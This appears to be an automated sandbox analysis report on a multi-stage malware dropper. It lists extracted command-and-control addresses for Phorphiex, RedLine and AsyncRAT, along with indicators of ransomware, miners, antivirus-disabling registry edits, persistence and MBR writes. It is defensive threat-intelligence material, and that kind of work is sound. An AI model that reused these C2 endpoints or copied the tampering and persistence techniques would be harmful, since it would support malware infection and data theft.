Resubmissions
14-11-2024 23:57
241114-3zzkpavhpf 1014-11-2024 23:44
241114-3rj52avgna 1014-11-2024 23:36
241114-3ln7ssvjfs 1014-11-2024 23:24
241114-3dnajayler 1014-11-2024 23:10
241114-25qpastqgt 10Analysis
-
max time kernel
1200s -
max time network
1149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66
-
mutex
Klipux
Extracted
redline
bundle
185.215.113.67:15206
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
lmk8StbxTzvz
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
resource yara_rule behavioral2/files/0x0003000000022906-4088.dat family_ammyyadmin -
Ammyyadmin family
-
Asyncrat family
-
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe -
Phorphiex family
-
Phorphiex payload 2 IoCs
resource yara_rule behavioral2/files/0x0013000000023bf1-74.dat family_phorphiex behavioral2/files/0x0007000000023ff7-3903.dat family_phorphiex -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/files/0x0003000000000733-3173.dat family_redline behavioral2/memory/3952-3178-0x00000000003A0000-0x00000000003F2000-memory.dmp family_redline -
Redline family
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
resource yara_rule behavioral2/files/0x0002000000021eaa-142.dat family_lockbit -
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description pid Process procid_target PID 6016 created 3388 6016 3510420815.exe 55 PID 6016 created 3388 6016 3510420815.exe 55 PID 4756 created 3388 4756 winupsecvmgr.exe 55 PID 3968 created 3388 3968 Blsvr.exe 55 PID 3968 created 3388 3968 Blsvr.exe 55 PID 3968 created 3388 3968 Blsvr.exe 55 PID 4756 created 3388 4756 winupsecvmgr.exe 55 PID 4756 created 3388 4756 winupsecvmgr.exe 55 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe -
Xmrig family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023f90-3908.dat family_asyncrat -
Renames multiple (600) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/3968-3238-0x00007FF7136A0000-0x00007FF713C18000-memory.dmp xmrig behavioral2/memory/6008-3337-0x00007FF73D300000-0x00007FF73DAEF000-memory.dmp xmrig behavioral2/memory/4756-3339-0x00007FF754AA0000-0x00007FF755037000-memory.dmp xmrig behavioral2/memory/4256-3340-0x00007FF66B780000-0x00007FF66BF6F000-memory.dmp xmrig behavioral2/memory/6008-3356-0x00007FF73D300000-0x00007FF73DAEF000-memory.dmp xmrig behavioral2/memory/4256-3359-0x00007FF66B780000-0x00007FF66BF6F000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3324 powershell.exe 6056 powershell.exe 3340 powershell.exe 5952 powershell.exe 2628 powershell.exe 5216 powershell.exe 3288 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts stub.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3680 chrome.exe 1500 chrome.exe 4804 chrome.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation file1.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 292098928.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation EED1.tmp Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Discord.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation ASUFER.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 72403897.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5556 cmd.exe 1088 powershell.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K3KsxkFT1914xtWCXgumJiCv.bat file1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\97OJaSI2gEIrEhsqFaww6vry.bat file1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 52 IoCs
pid Process 4860 clsid.exe 3948 file1.exe 4752 tstory.exe 3144 twztl.exe 4540 sysppvrdnvs.exe 3576 2537816796.exe 1640 292098928.exe 2588 1712418979.exe 6072 2751933726.exe 4504 2020.exe 2356 2020.exe 2940 3135025858.exe 3968 Blsvr.exe 1892 EED1.tmp 6016 3510420815.exe 4756 winupsecvmgr.exe 4196 stub.exe 3664 stub.exe 3952 bundle.exe 4316 rar.exe 4360 bot2.exe 3976 bot2.exe 3136 pimer_bbbcontents7.exe 3668 pimer_bbbcontents7.exe 2492 pimer_bbbcontents7.exe 2020 323862848.exe 4624 sysnldcvmr.exe 3416 Discord.exe 6056 ASUFER.exe 3140 subin.exe 5868 subin.exe 6140 subin.exe 5440 sc.exe 1948 subin.exe 5104 wmild.exe 3696 Discord.exe 1604 2563814828.exe 3288 72403897.exe 2568 1094527981.exe 3700 newtpp.exe 2288 1707518023.exe 2292 random.exe 380 AA_v3.exe 5624 AA_v3.exe 5724 AA_v3.exe 5592 1.exe 3384 Identification-1.exe 5200 legas.exe 5524 Bahjq47pKX.exe 3860 LNpItppmFh.exe 1652 yoyf.exe 4724 utility-inst.exe -
Loads dropped DLL 64 IoCs
pid Process 4860 clsid.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 2356 2020.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 3664 stub.exe 2188 MsiExec.exe 2188 MsiExec.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe 3976 bot2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" twztl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 323862848.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-1045960512-3948844814-3059691613-1000\desktop.ini 1712418979.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\desktop.ini 1712418979.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: tstory.exe File opened (read-only) \??\E: tstory.exe File opened (read-only) \??\O: tstory.exe File opened (read-only) \??\S: tstory.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: tstory.exe File opened (read-only) \??\N: tstory.exe File opened (read-only) \??\W: tstory.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\M: tstory.exe File opened (read-only) \??\T: tstory.exe File opened (read-only) \??\Z: tstory.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: tstory.exe File opened (read-only) \??\X: tstory.exe File opened (read-only) \??\G: tstory.exe File opened (read-only) \??\H: tstory.exe File opened (read-only) \??\I: tstory.exe File opened (read-only) \??\K: tstory.exe File opened (read-only) \??\P: tstory.exe File opened (read-only) \??\U: tstory.exe File opened (read-only) \??\Y: tstory.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: tstory.exe File opened (read-only) \??\L: tstory.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: tstory.exe File opened (read-only) \??\R: tstory.exe File opened (read-only) \??\X: msiexec.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 24 pastebin.com 25 pastebin.com 39 iplogger.com 40 iplogger.com 143 raw.githubusercontent.com 144 raw.githubusercontent.com 290 pastebin.com 293 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 checkip.dyndns.org 79 ipinfo.io 80 ipinfo.io 123 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1180 powercfg.exe 5728 powercfg.exe 712 powercfg.exe 5756 powercfg.exe 5996 cmd.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 AA_v3.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0005000000022903-4079.dat autoit_exe -
Drops file in System32 directory 28 IoCs
description ioc Process File created C:\Windows\system32\perfh011.dat WMIADAP.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 integrator.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-wal integrator.exe File created C:\Windows\system32\perfc010.dat WMIADAP.EXE File created C:\Windows\system32\perfc009.dat WMIADAP.EXE File created C:\Windows\system32\perfh00A.dat WMIADAP.EXE File created C:\Windows\system32\PerfStringBackup.TMP WMIADAP.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 integrator.exe File created C:\Windows\system32\perfh007.dat WMIADAP.EXE File created C:\Windows\system32\spool\PRINTERS\00002.SPL splwow64.exe File created C:\Windows\system32\perfh009.dat WMIADAP.EXE File created C:\Windows\system32\spool\PRINTERS\PPujso7znsnffhpm3_0kd30hwpc.TMP printfilterpipelinesvc.exe File created C:\Windows\system32\perfh00C.dat WMIADAP.EXE File opened for modification C:\Windows\system32\PerfStringBackup.INI WMIADAP.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db integrator.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\system32\perfc011.dat WMIADAP.EXE File created C:\Windows\system32\perfc007.dat WMIADAP.EXE File created C:\Windows\system32\perfc00A.dat WMIADAP.EXE File created C:\Windows\system32\perfh010.dat WMIADAP.EXE File created C:\Windows\system32\spool\PRINTERS\PPz55hhwmx5wleyq6chyqybd73c.TMP printfilterpipelinesvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shm integrator.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db integrator.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File created C:\Windows\system32\perfc00C.dat WMIADAP.EXE File created C:\Windows\system32\spool\PRINTERS\PP2s10iasyrd73viap2z_sllaw.TMP printfilterpipelinesvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-wal integrator.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shm integrator.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4580 tasklist.exe 4940 tasklist.exe 5368 tasklist.exe 5092 tasklist.exe 2668 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1320 cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\IPjaex13M.bmp" 1712418979.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\IPjaex13M.bmp" 1712418979.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 1892 EED1.tmp -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4860 set thread context of 3524 4860 clsid.exe 98 PID 3968 set thread context of 6008 3968 Blsvr.exe 198 PID 4756 set thread context of 5688 4756 winupsecvmgr.exe 208 PID 4756 set thread context of 4256 4756 winupsecvmgr.exe 290 PID 3136 set thread context of 2492 3136 pimer_bbbcontents7.exe 408 PID 5200 set thread context of 5464 5200 legas.exe 504 -
resource yara_rule behavioral2/memory/3664-3154-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx behavioral2/memory/3664-3156-0x00007FFF42630000-0x00007FFF4263F000-memory.dmp upx behavioral2/memory/3664-3155-0x00007FFF2C590000-0x00007FFF2C5B7000-memory.dmp upx behavioral2/memory/3664-3157-0x00007FFF3AAD0000-0x00007FFF3AAE9000-memory.dmp upx behavioral2/memory/3664-3158-0x00007FFF2B690000-0x00007FFF2B6BB000-memory.dmp upx behavioral2/memory/3664-3159-0x00007FFF2B470000-0x00007FFF2B495000-memory.dmp upx behavioral2/memory/3664-3160-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp upx behavioral2/memory/3664-3161-0x00007FFF2C570000-0x00007FFF2C589000-memory.dmp upx behavioral2/memory/3664-3162-0x00007FFF425B0000-0x00007FFF425BD000-memory.dmp upx behavioral2/memory/3664-3164-0x00007FFF28070000-0x00007FFF280A4000-memory.dmp upx behavioral2/memory/3664-3163-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx behavioral2/memory/3664-3165-0x00007FFF1D0A0000-0x00007FFF1D5D3000-memory.dmp upx behavioral2/memory/3664-3166-0x00007FFF26090000-0x00007FFF2615E000-memory.dmp upx behavioral2/memory/3664-3167-0x00007FFF2BF00000-0x00007FFF2BF14000-memory.dmp upx behavioral2/memory/3664-3168-0x00007FFF3B8C0000-0x00007FFF3B8CD000-memory.dmp upx behavioral2/memory/3664-3205-0x00007FFF2B690000-0x00007FFF2B6BB000-memory.dmp upx behavioral2/memory/3664-3206-0x00007FFF25510000-0x00007FFF255C3000-memory.dmp upx behavioral2/memory/3664-3233-0x00007FFF2B470000-0x00007FFF2B495000-memory.dmp upx behavioral2/memory/3664-3242-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp upx behavioral2/memory/3664-3264-0x00007FFF2C570000-0x00007FFF2C589000-memory.dmp upx behavioral2/memory/3664-3307-0x00007FFF1D0A0000-0x00007FFF1D5D3000-memory.dmp upx behavioral2/memory/3664-3306-0x00007FFF28070000-0x00007FFF280A4000-memory.dmp upx behavioral2/memory/3664-3314-0x00007FFF26090000-0x00007FFF2615E000-memory.dmp upx behavioral2/memory/3664-3320-0x00007FFF2BF00000-0x00007FFF2BF14000-memory.dmp upx behavioral2/memory/3664-3336-0x00007FFF25510000-0x00007FFF255C3000-memory.dmp upx behavioral2/memory/3664-3322-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx behavioral2/memory/3664-3341-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx behavioral2/memory/3664-3360-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx behavioral2/files/0x0007000000023ff8-3920.dat upx behavioral2/memory/6056-3922-0x0000000000400000-0x0000000000429000-memory.dmp upx behavioral2/memory/6056-3964-0x0000000000400000-0x0000000000429000-memory.dmp upx behavioral2/memory/5104-3968-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral2/memory/5104-3995-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral2/memory/5104-4021-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral2/memory/3664-4877-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp upx behavioral2/memory/3664-4880-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp upx -
Drops file in Program Files directory 13 IoCs
description ioc Process File created \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms msiexec.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\ msiexec.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification \??\c:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE msiexec.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms msiexec.exe File opened for modification \??\c:\Program Files\Microsoft Office\Office16\OSPP.HTM msiexec.exe File opened for modification \??\c:\Program Files\Microsoft Office\Office16\SLERROR.XML msiexec.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE msiexec.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll msiexec.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pidgenx.dll msiexec.exe File opened for modification \??\c:\Program Files\Microsoft Office\Office16\OSPP.VBS msiexec.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created \??\c:\Windows\Installer\e5a1b2a.msi msiexec.exe File created C:\Windows\ehome\DNS.bat ASUFER.exe File opened for modification C:\Windows\ehome\instsrv.exe ASUFER.exe File created C:\Windows\ehome\sc.exe ASUFER.exe File opened for modification C:\Windows\ehome\wmild.exe ASUFER.exe File created C:\Windows\ehome\N13 ASUFER.exe File created C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File opened for modification C:\Windows\ehome\DNS.bat ASUFER.exe File opened for modification C:\Windows\ehome\N13 ASUFER.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140.dll_x86 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x86 msiexec.exe File opened for modification C:\Windows\Installer\MSI23E8.tmp msiexec.exe File opened for modification C:\Windows\ehome\DPS.bat ASUFER.exe File created C:\Windows\ehome\amsql.exe ASUFER.exe File opened for modification \??\c:\Windows\Installer\ msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x64 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x86 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x64 msiexec.exe File created \??\c:\Windows\Installer\e5a1b3b.msi msiexec.exe File opened for modification C:\windows\ehome ASUFER.exe File created \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt msiexec.exe File opened for modification \??\c:\Windows\Installer\87b0.msi msiexec.exe File created C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\ msiexec.exe File created C:\Windows\sysnldcvmr.exe 323862848.exe File created C:\Windows\ehome\SETA.bat ASUFER.exe File created C:\Windows\ehome\ar.ocx ASUFER.exe File opened for modification C:\Windows\Installer\MSI1DF9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1F91.tmp msiexec.exe File opened for modification C:\Windows\ehome\sDPS.bat ASUFER.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x64 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\ msiexec.exe File created C:\Windows\ehome\SER.bat ASUFER.exe File opened for modification C:\Windows\ehome\SER.bat ASUFER.exe File created C:\Windows\ehome\ser.reg ASUFER.exe File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\ehome\cmsdll.exe ASUFER.exe File created C:\Windows\ehome\nobuf.vbs ASUFER.exe File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE File opened for modification \??\c:\Windows\Installer\e5a1b2a.msi msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x86 msiexec.exe File created C:\Windows\ehome\sDPS.bat ASUFER.exe File opened for modification C:\Windows\sysnldcvmr.exe 323862848.exe File opened for modification C:\Windows\ehome\cmsdll.exe ASUFER.exe File created C:\Windows\ehome\readcac.exe ASUFER.exe File created C:\Windows\ehome\subin.exe ASUFER.exe File opened for modification C:\Windows\ehome\subin.exe ASUFER.exe File created C:\Windows\ehome\SURFSET.exe wmild.exe File opened for modification C:\Windows\sysppvrdnvs.exe twztl.exe File opened for modification C:\Windows\Installer\MSI1E0A.tmp msiexec.exe File created C:\Windows\ehome\DPS.bat ASUFER.exe File opened for modification C:\Windows\ehome\amsql.exe ASUFER.exe File opened for modification C:\Windows\ehome\readcac.exe ASUFER.exe File opened for modification C:\Windows\ehome\SETA.bat ASUFER.exe File created C:\Windows\ehome\instsrv.exe ASUFER.exe File opened for modification C:\Windows\ehome\sc.exe ASUFER.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x86 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x64 msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt msiexec.exe File created C:\Windows\ehome\__tmp_rar_sfx_access_check_240858671 